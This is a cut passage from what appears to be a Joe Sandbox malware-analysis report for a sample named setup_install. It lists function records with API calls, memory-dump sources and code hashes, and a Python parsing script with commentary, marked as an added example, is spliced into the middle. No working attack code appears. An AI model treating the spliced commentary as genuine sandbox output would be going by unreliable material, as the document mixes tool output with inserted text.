                                        • String ID: $$'$Assertion failed: (%s), file %s, line %d$H
                                        • API String ID: 24197342-762737505
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: A,J$A,J
                                        • API String ID: 4096897932-3960289448
                                        • Opcode ID: 23564d9f278e259d7991021690f0f8457fa8c4b18cd70159d440db26347ba0d1
                                        • Instruction ID: f1532a0e1b35520f70e663d9a691094302bf38ced050ccaf1e9147a996a43a67
                                        • Opcode Fuzzy Hash: 23564d9f278e259d7991021690f0f8457fa8c4b18cd70159d440db26347ba0d1
                                        • Instruction Fuzzy Hash: AA21E4B06093049FD740EF69D18569EFBE0EF88358F41892EF5C8D7312E77898819B86
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcpystrcmp
                                        • String ID: *$XjJ
                                        • API String ID: 566201450-163032186
                                        • Opcode ID: b403c6d1c831a1acde9eed242c655a5d4883552282975c43d21fe525d627b4d1
                                        • Instruction ID: a4fe201439f620883ddbd6e9045e6a91d467bc669ca58a6b90b41cc0be5b1d4d
                                        • Opcode Fuzzy Hash: b403c6d1c831a1acde9eed242c655a5d4883552282975c43d21fe525d627b4d1
                                        • Instruction Fuzzy Hash: 4FA14A71608611CFCB00EF29D08065EBBE1EF88304F55C96EE8989B346D739E845DB9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strlen$memcpymemsetstrcmp
                                        • String ID: *$XjJ
                                        • API String ID: 1303273620-163032186
                                        • Opcode ID: 4e208bc4532878ca1fc697e58cfe62dacc8e2b705aae9e991e01cb12a5e5b0b7
                                        • Instruction ID: c84fa2cd5b087d5033b27c961e38efd3be2a59e7ad3f9698a9dd6785a4cb30a7
                                        • Opcode Fuzzy Hash: 4e208bc4532878ca1fc697e58cfe62dacc8e2b705aae9e991e01cb12a5e5b0b7
                                        • Instruction Fuzzy Hash: 0B816CB5A056108FCB00EF29D48865EFBF5FF88314F4585AEE8859B321D735E845CB86
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: )$HCJ$KCJ
                                        • API String ID: 1004003707-1204724174
                                        • Opcode ID: 5d9c9dc4ba13e1e00770abbf5d361528a07d903842089d458e0efe53c8172aa2
                                        • Instruction ID: c8ab03de61885aba7daf93ff69b776911636b45ef14813a2dff48fd826732978
                                        • Opcode Fuzzy Hash: 5d9c9dc4ba13e1e00770abbf5d361528a07d903842089d458e0efe53c8172aa2
                                        • Instruction Fuzzy Hash: 0FE15C74608301CFCB11CF28C48479ABBE1AF99314F19897AEC895F346C779E855CB96
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: strcmp
                                        • String ID: )$NCJ$PCJ$QCJ
                                        • API String ID: 1004003707-1353880924
                                        • Opcode ID: 7b6588ec5e35c57e2ce984c6a26d6a68a77ed945f90186625a8bf9c76c26a6e1
                                        • Instruction ID: d5829f083aeedb66a67b3239c724206b8db2c39574e9af5c011da565b72a8749
                                        • Opcode Fuzzy Hash: 7b6588ec5e35c57e2ce984c6a26d6a68a77ed945f90186625a8bf9c76c26a6e1
                                        • Instruction Fuzzy Hash: 2BD1F870108242CFCB11DF18C4C47A9BBE1AF59318F0985BAEC895F35BC7B99885DBA5
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00496F74
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00496F81
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00496FA1
                                        • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00496FAE
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00496FBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 2735080877-129645102
                                        • Opcode ID: cfdcc70aea794bf11e56da8099a8f06f2ceac82ba9ce8656ccd518b280749dad
                                        • Instruction ID: 930e7aa5e6edef1ae5a77c2519aca1f1f69a435244284f8ebb0f9fccada950ca
                                        • Opcode Fuzzy Hash: cfdcc70aea794bf11e56da8099a8f06f2ceac82ba9ce8656ccd518b280749dad
                                        • Instruction Fuzzy Hash: AC512B705456008ACF107F7AC48A22EBEE1AF5234CF06993EE5845B753DB7C9484C7AE
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00497158
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00497165
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00497184
                                        • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00497191
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 004971A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 2735080877-129645102
                                        • Opcode ID: 23dc7a50f40ad90740d79a23faa2eb588973f038439d5a03c146e98a053721bd
                                        • Instruction ID: 775bddfed98edd1dfece01d6c8a5d9538eeece84b8935b8960f05ea5e3387447
                                        • Opcode Fuzzy Hash: 23dc7a50f40ad90740d79a23faa2eb588973f038439d5a03c146e98a053721bd
                                        • Instruction Fuzzy Hash: 2751FB705096008ADF107F76C48A22EBEE1AF5234CF06993EE5845B753DB7D9484C7AE
                                        APIs
                                        • Sleep.KERNEL32(?,?,?,?,?,?,00000000,649413C7), ref: 64941077
                                        • _amsg_exit.MSVCRT ref: 649410B4
                                        • Sleep.KERNEL32(?,?,?,?,?,?,00000000,649413C7), ref: 649410F0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$_amsg_exit
                                        • String ID:
                                        • API String ID: 2363106680-0
                                        • Opcode ID: f7f75727a2dd23a81957e1cb190c5b6ffc83549422a42600a46acb2e60445d05
                                        • Instruction ID: 15978ef8e7a03c687e922c33e11a76cd584becd45666ec274e263b518fc99e9a
                                        • Opcode Fuzzy Hash: f7f75727a2dd23a81957e1cb190c5b6ffc83549422a42600a46acb2e60445d05
                                        • Instruction Fuzzy Hash: 31418EB0ACC3518BEB04EF28C58A74A7FF9FB47344F508A29D8848B245E775D490CB92
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 31f1891d166b36e942c50cd02af1d0f5e3d1e68bade23cc6733cb2e485a68483
                                        • Instruction ID: be167bbe5098dc908586ec92a8d52b4ce5705f71f6316f7914c3545c114fb529
                                        • Opcode Fuzzy Hash: 31f1891d166b36e942c50cd02af1d0f5e3d1e68bade23cc6733cb2e485a68483
                                        • Instruction Fuzzy Hash: 69318EB0908705ABC701BF15D58179ABFF0FB49384F11486EE6C587361E7398891CB9A
                                        APIs
                                        • Sleep.KERNEL32 ref: 64946F0B
                                        • Sleep.KERNEL32 ref: 64946EFD
                                          • Part of subcall function 64942FA0: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE,?,?,?), ref: 64942FC6
                                          • Part of subcall function 64942FA0: free.MSVCRT(?,?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE), ref: 64942FE9
                                        • free.MSVCRT ref: 64946F26
                                        • CloseHandle.KERNEL32 ref: 64946ECE
                                          • Part of subcall function 64942EB0: ReleaseSemaphore.KERNEL32(?,?,?,00000000,?,?,?,64944D20), ref: 64942EFC
                                        • _errno.MSVCRT ref: 64946F38
                                        • _errno.MSVCRT ref: 64946F58
                                        • _errno.MSVCRT ref: 64946F73
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$CloseSleepfree$ChangeFindHandleNotificationReleaseSemaphore
                                        • String ID:
                                        • API String ID: 4138788905-0
                                        • Opcode ID: 92be039fdf94c63c11c2dd83f2b68107d81e1178f605496971cf59e728731a19
                                        • Instruction ID: 906944e899c7ee6cdba55aa809eda82f012ab30f1daa23f899033dcd120ba93b
                                        • Opcode Fuzzy Hash: 92be039fdf94c63c11c2dd83f2b68107d81e1178f605496971cf59e728731a19
                                        • Instruction Fuzzy Hash: 722186B15886158BE700AF78D48425EBFB4FF01364F115A59E8E887380DB34D850CFA2
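Every record in this section follows the same fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes the section easy to parse and cross-reference: the two functions whose calls start at 00496F74 and 00497158 share API String ID 2735080877-129645102 but carry different Opcode IDs, and the function calling Sleep at 64946F0B comes from the image dumped at 64940000 rather than from the main image at 00400000. The Python script below is an added example, not code from Joe Sandbox or from the sample under analysis. It parses records in this layout, drops the "Download File" link label from the Associated lines, records the image base of each dump, and groups functions by their Similarity fields so that records with the same API/string profile but different code stand out. It assumes that each record opens with the "APIs" header and that bullets use the "•" prefix exactly as printed here; the embedded SAMPLE is constructed from three records above and abridged (most Associated lines, Instruction IDs and fuzzy hashes dropped).

```python
"""Parse Joe Sandbox Execution Graph function records and group them by Similarity
fields. Added example, not Joe Sandbox code; assumes each record opens with the
'APIs' header and bullets use the '•' prefix exactly as printed in the report."""
import re
from collections import defaultdict
# Constructed sample: three records copied from this section and abridged
# (most Associated lines, Instruction IDs and fuzzy hashes dropped).
SAMPLE = """\
APIs
• pthread_once.LIBWINPTHREAD-1 ref: 00496F74
• pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00496F81
• pthread_once.LIBWINPTHREAD-1 ref: 00496FA1
• pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00496FAE
• pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00496FBF
Memory Dump Source
• Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
Similarity
• API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
• String ID: lpJ
• API String ID: 2735080877-129645102
• Opcode ID: cfdcc70aea794bf11e56da8099a8f06f2ceac82ba9ce8656ccd518b280749dad
APIs
• pthread_once.LIBWINPTHREAD-1 ref: 00497158
• pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00497191
Similarity
• API String ID: 2735080877-129645102
• Opcode ID: 23dc7a50f40ad90740d79a23faa2eb588973f038439d5a03c146e98a053721bd
APIs
• Sleep.KERNEL32 ref: 64946F0B
  • Part of subcall function 64942FA0: free.MSVCRT(?,?,?,?,?,00000000,00000000,?,649448D2,?,?,00000000,00000004,64944DDE), ref: 64942FE9
• _errno.MSVCRT ref: 64946F38
Memory Dump Source
• Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
Similarity
• API ID: _errno$CloseSleepfree$ChangeFindHandleNotificationReleaseSemaphore
• String ID:
• API String ID: 4138788905-0
• Opcode ID: 92be039fdf94c63c11c2dd83f2b68107d81e1178f605496971cf59e728731a19
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# '• api.MODULE(args), ref: ADDR', optionally prefixed with 'Part of subcall function X:'
CALL_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+):\s*)?"
                     r"(?P<api>\w+)\.(?P<mod>[\w.-]+?)(?:\(.*\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<addr>[0-9A-Fa-f]+)$")  # '• text, xrefs: ADDR'
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")                     # '• Key: value'
IMAGE_BASE_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")


def parse_records(text):
    """One dict per record: {'calls': [...], 'strings': [...], 'fields': {...}}."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":  # every record starts with its APIs header
                rec = {"calls": [], "strings": [], "fields": {}}
                records.append(rec)
            section = line
        elif not line or rec is None:
            continue
        elif section == "APIs":
            m = CALL_RE.match(line)
            if m:
                rec["calls"].append({"api": m["api"], "module": m["mod"], "addr": int(m["addr"], 16),
                                     "subcall_of": int(m["subfn"], 16) if m["subfn"] else None})
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec["strings"].append((m["text"], int(m["addr"], 16)))
        else:
            m = FIELD_RE.match(line)
            if m:
                # 'Download File' is the report's link label, not part of the dump file name
                val = re.sub(r"Download File$", "", m["val"]).strip()
                if m["key"] == "Source File":
                    base = IMAGE_BASE_RE.search(val)
                    rec["fields"]["image_base"] = int(base["base"], 16) if base else None
                rec["fields"].setdefault(m["key"], val)  # keep the first of repeated keys
    return records


def group_by(records, key):
    groups = defaultdict(list)  # distinct non-empty field value -> record indices
    for i, rec in enumerate(records):
        if rec["fields"].get(key):
            groups[rec["fields"][key]].append(i)
    return dict(groups)


def same_profile_different_code(records):
    """API String IDs shared by records whose Opcode IDs differ: same API/string
    profile but a different instruction stream, e.g. two copies of one routine."""
    hits = {}
    for sig, idxs in group_by(records, "API String ID").items():
        if len(idxs) > 1 and len({records[i]["fields"].get("Opcode ID") for i in idxs}) > 1:
            hits[sig] = idxs
    return hits
```

Pointing parse_records at the text of a whole Execution Graph section gives the grouping across every function in it. API String ID is a pair of hashes, one over the API list and one over the string list (the records above with an empty String ID end in -0), so two records can share it while their code differs; Opcode ID is the identity to use when deciding whether two records are the same code.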
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 69921fa1e262df55140dd5833e7b90d433ad28dbfb102bd42ecac495beae1909
                                        • Instruction ID: a827d8aa9369b6bb23e44806dcf5ffb079df54b06ea0dfd2bc32fb0fcfa9b4d9
                                        • Opcode Fuzzy Hash: 69921fa1e262df55140dd5833e7b90d433ad28dbfb102bd42ecac495beae1909
                                        • Instruction Fuzzy Hash: E82141B1A0C3459AC702BF25C58079EBFF0EB46784F11489EE5C597262E33988918B9A
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlen
                                        • String ID: SJ
                                        • API String ID: 4096897932-3819844229
                                        • Opcode ID: 42b31b86f0b27c17474c7d6f277994f91e1340138fc3f0d498c82fc1590b57b0
                                        • Instruction ID: d6315ef564f79e3e6211f83f6e687cda52ca573428465e291f75cefdfc06296a
                                        • Opcode Fuzzy Hash: 42b31b86f0b27c17474c7d6f277994f91e1340138fc3f0d498c82fc1590b57b0
                                        • Instruction Fuzzy Hash: 0C2160B19083059FDB02BF15C58079ABFF4FB49784F11482EE9C587361E33998948B9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$CreateSemaphorecallocfree
                                        • String ID:
                                        • API String ID: 2040119499-0
                                        • Opcode ID: c668ece4426f35e080742488194e905930ec51b03dd80f5d8881c30df5085e09
                                        • Instruction ID: ae910fbc6fa32d062186c2a72df364ff7452ccb3633f621e5ee46154c868cff0
                                        • Opcode Fuzzy Hash: c668ece4426f35e080742488194e905930ec51b03dd80f5d8881c30df5085e09
                                        • Instruction Fuzzy Hash: 93213DB16882109FEB106F69C54835E7FE5EF42364F158658EC688B3D0D778CD60DBA2
                                        APIs
                                        Strings
                                        • M%p %d %s, xrefs: 64942E97
                                        • M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s, xrefs: 64942E6E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentThreadprintf
                                        • String ID: M%p %d %s$M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
                                        • API String ID: 2356641437-4089461704
                                        • Opcode ID: aa90dc517b67e74390cbe8a2d630ccb9351a8b5861b5c024666a05db2b1ad8ab
                                        • Instruction ID: 3d066a1fa89851a6b440f176ce42c419914d78daba26d6ee6e56cd2ecff06933
                                        • Opcode Fuzzy Hash: aa90dc517b67e74390cbe8a2d630ccb9351a8b5861b5c024666a05db2b1ad8ab
                                        • Instruction Fuzzy Hash: DC2167B8949301AF8744DF0AD58480AFBE5FFD9660F65896EE88897320D730E940CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
